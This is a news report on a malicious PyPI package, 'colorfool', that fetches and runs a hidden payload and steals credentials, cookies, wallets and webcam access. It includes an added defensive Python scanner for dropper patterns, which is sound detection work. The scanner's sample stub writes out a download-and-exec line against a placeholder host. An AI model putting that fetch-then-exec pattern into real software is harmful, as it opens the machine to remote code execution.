Security researchers have discovered another malicious PyPI package, whose goal is to steal people’s sensitive data and allow unauthenticated users to access the compromised endpoint.
They said the package, called “colorfool”, was clearly harmful. It contained a “suspiciously large” Python file whose only job was to download another file from the Internet and run it, making sure it remained hidden from the machine’s user.
“The post immediately looked suspicious and potentially malicious,” the report stated.
To make matters worse, that wasn’t the only suspicious thing in this file. The URL from which the package downloads its payload is hard-coded, which is another red flag.
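The traits described above (an outsized module, a hard-coded download URL, a network fetch followed by dynamic execution) are easy to look for statically before a package is ever installed. The following script is an added example written for this page; it is not code from the researchers' report, from The Register, or from the "colorfool" package itself. It parses each module with Python's `ast` module and flags the fetch-then-execute combination. The sample package it builds in a temporary directory is constructed for the demonstration, uses a placeholder `example.invalid` host, and is only parsed, never executed. The size threshold and the module and call lists are assumptions to tune for your own environment.

```python
"""Static triage of a Python package for download-and-execute (dropper) indicators.

Added example; the sample package below is constructed and is never run, only parsed.
"""
import ast
import re
import tempfile
from pathlib import Path

URL_RE = re.compile(r"https?://[^\s'\"]+")          # hard-coded HTTP(S) URLs
EXEC_CALLS = {"exec", "eval"}                        # dynamic code execution
NET_MODULES = {"urllib", "urllib.request", "requests", "http.client", "socket"}
SIZE_THRESHOLD = 50_000                              # bytes; assumed cut-off for "suspiciously large"


def scan_source(src: str) -> dict:
    """Return indicator findings for one module's source text."""
    findings = {
        "urls": sorted(set(URL_RE.findall(src))),
        "net": [],
        "exec": [],
        "large": len(src.encode("utf-8")) > SIZE_THRESHOLD,
        "unparseable": False,
    }
    try:
        tree = ast.parse(src)
    except SyntaxError:
        findings["unparseable"] = True               # heavily obfuscated code often fails to parse
        return findings
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            findings["net"] += [a.name for a in node.names if a.name in NET_MODULES]
        elif isinstance(node, ast.ImportFrom) and node.module in NET_MODULES:
            findings["net"].append(node.module)
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in EXEC_CALLS):
            findings["exec"].append(node.func.id)
    findings["net"] = sorted(set(findings["net"]))
    findings["exec"] = sorted(set(findings["exec"]))
    return findings


def is_dropper_like(f: dict) -> bool:
    """The combination the report describes: a fixed URL, a network fetch, then execution."""
    return bool(f["urls"]) and bool(f["net"]) and bool(f["exec"])


def scan_package(root: Path) -> dict:
    """Scan every .py file under root; returns {relative path: findings}."""
    return {
        str(p.relative_to(root)): scan_source(p.read_text(encoding="utf-8", errors="replace"))
        for p in sorted(root.rglob("*.py"))
    }


def suspicious_files(root: Path) -> list:
    """Relative paths of modules that match the dropper pattern."""
    return [name for name, f in scan_package(root).items() if is_dropper_like(f)]


# Constructed sample package: two benign modules and one stub shaped like the reported one.
SAMPLE_FILES = {
    "colorfool/__init__.py": "from .palette import rgb\n",
    "colorfool/palette.py": "def rgb(r, g, b):\n    return (r, g, b)\n",
    "colorfool/stub.py": (
        "import urllib.request\n"
        "URL = 'http://payload.example.invalid/stage2'  # placeholder host, not real\n"
        "data = urllib.request.urlopen(URL).read()\n"
        "exec(data)\n"
    ),
}


def build_sample_package(base: Path) -> Path:
    """Write the constructed sample package under base and return base."""
    for rel, text in SAMPLE_FILES.items():
        path = base / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text, encoding="utf-8")
    return base


def demo() -> list:
    """Build the sample in a temp dir and return the files the scanner flags."""
    with tempfile.TemporaryDirectory() as d:
        return suspicious_files(build_sample_package(Path(d)))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        root = build_sample_package(Path(d))
        for name, f in scan_package(root).items():
            verdict = "DROPPER-LIKE" if is_dropper_like(f) else "ok"
            print(f"{name:24} {verdict:13} urls={f['urls']} net={f['net']} exec={f['exec']}")
```

Run it against an extracted sdist or wheel directory instead of the sample to triage a real package; a hit is a reason to read the flagged module, not proof of malice, since legitimate installers also fetch resources. Note that `ast` parsing alone misses strings assembled at runtime, so a module that fails to parse or that builds its URL from fragments deserves the same manual look.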
A Python script, code.py, carries information-stealing functions such as keylogging and cookie extraction. It was also capable of stealing passwords, killing apps, taking screenshots, stealing encrypted wallet data, and even using the device’s webcam.
What makes this package different from all the other malicious PyPI packages that security researchers discover on an almost daily basis is its Frankenstein-like nature. The researchers suggest that the code was patched together from pieces of other people’s work, sometimes without regard to logic, code flow, or anything else, as if the author had simply copied and pasted bits of code, often leaving redundant code to sit there unused.
“The combination of the obfuscation along with the blatantly malicious code indicates that it is unlikely that all of the code was developed by a single entity,” the researchers said. “It is possible that the final developer has mostly used other people’s code, and added it by copying and pasting.”
In fact, the code even contains the game “Snake”, which doesn’t seem to serve any particular purpose.
For researchers, this is a great example of “democratization of cybercrime,” where threat actors can simply take code from other threat actors and incorporate it into their work.
Via: The Register